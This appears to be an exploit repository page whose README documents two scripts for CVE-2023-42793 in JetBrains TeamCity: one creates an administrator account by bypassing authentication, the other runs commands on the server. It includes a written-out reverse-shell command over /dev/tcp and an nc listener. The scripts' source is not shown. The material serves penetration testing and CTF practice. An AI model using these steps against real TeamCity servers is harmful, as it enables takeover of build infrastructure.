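POC details: 05d7f165639e093454662cdc4463f4943b141166

Source
Related vulnerability
Title: JetBrains TeamCity security vulnerability (CVE-2023-42793)
Description: JetBrains TeamCity is a distributed build management and continuous integration tool from the Czech company JetBrains. It provides continuous unit testing, code quality analysis, and build problem analysis reporting. JetBrains TeamCity versions before 2023.05.4 contain a security vulnerability that allows an attacker to bypass authentication, leading to RCE on the TeamCity server.
Description
JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793
Introduction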
# CVE-2023-42793 - TeamCity Admin Account Creation Leading to RCE
>  Use `exploit.py` first to create an administrator account, then use `rce.py` to execute commands on the target. For a reverse shell, check [this](https://github.com/Zyad-Elsayed/CVE-2023-42793?tab=readme-ov-file#for-reverse-shell).

# exploit script

## Description
This script exploits CVE-2023-42793 to create an admin account on a TeamCity server. It sends a POST request to the target URL to create an admin user with specified or random credentials.

## Usage
```bash
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]
```

### Options
- `-u, --url URL`: Target URL (required)
- `-v, --verbose`: Enable verbose mode
- `-n, --username USERNAME`: Specify username (default: random)
- `-p, --password PASSWORD`: Specify password (default: random)
- `-e, --email EMAIL`: Specify email (default: random)
- `-t, --token-file`: File to save the token

## Prerequisites
- Python 3.x
- Python libraries
    + To install the dependencies, run `pip3 install -r requirements.txt`

## Examples
1. Exploit with random username, password, and email:
   ```bash
   python exploit.py -u http://target.com
   ```

2. Exploit with specified username, password, and email:
   ```bash
   python exploit.py -u http://target.com -n admin -p admin123 -e admin@example.com
   ```


## Output
Upon successful exploitation, the script prints the URL, username, and password of the created admin account, then saves the output in the token file.

# Remote Code Execution (RCE) Script
## Description
This script allows executing commands on a vulnerable TeamCity server exploiting CVE-2023-42793. It first enables the debug processes and then executes the specified command using the appropriate API endpoints.

## Usage
```bash
python rce.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]
```

## Options
- `-u, --url URL` : Target URL (required)
- `-t, --token-file` : Specify the file containing the token
- `-c, --command COMMAND`: Specify command to execute (RCE)
- `-P, --port PORT`: Specify port (default is 80)

## Example
Exploit with a specified command:
```bash
python rce.py -u http://target.com -t token -c "whoami"
```

## For reverse shell
```bash
python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
```
+ In this reverse shell command, replace {IP} with your IP and {port} with the port you are listening on
+ Create a listener using nc, e.g. `nc -nvlp 5555`
+ For more, check [revshells](https://www.revshells.com/)

## Notes
- This script has been tested on [Runner.htb](https://app.hackthebox.com/machines/598) from Hack The Box.
- This script is for educational purposes only.
- Use it responsibly and only on systems you are authorized to test.

## Credits
- Zyad Elsayed
  + GitHub Repository: [Zyad-Elsayed](https://github.com/Zyad-Elsayed)
  + LinkedIn account: [zyad-abdelbary](https://www.linkedin.com/in/zyad-abdelbary/)
- Original Exploit for admin account: ByteHunter ([Exploit-DB](https://www.exploit-db.com/exploits/51884))

## Resources

- [CVE-2023-42793 Description](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-42793): Official description of the CVE vulnerability.
- [Exploit Database Entry](https://www.exploit-db.com/exploits/51884): Original exploit code on Exploit Database.
- [TeamCity Blog](https://blog.jetbrains.com/teamcity/2023/10/cve-2023-42793-vulnerability-in-teamcity-october-18-2023-update/): Blog post discussing the CVE-2023-42793 vulnerability in TeamCity.
- [TeamCity Documentation](https://www.jetbrains.com/help/teamcity/): Official documentation for TeamCity.

File snapshot

[4.0K] /data/pocs/05d7f165639e093454662cdc4463f4943b141166
├── [4.6K] exploit.py
├── [1.3K] rce.py
├── [3.6K] README.md
└── [ 18] requirements.txt

0 directories, 4 files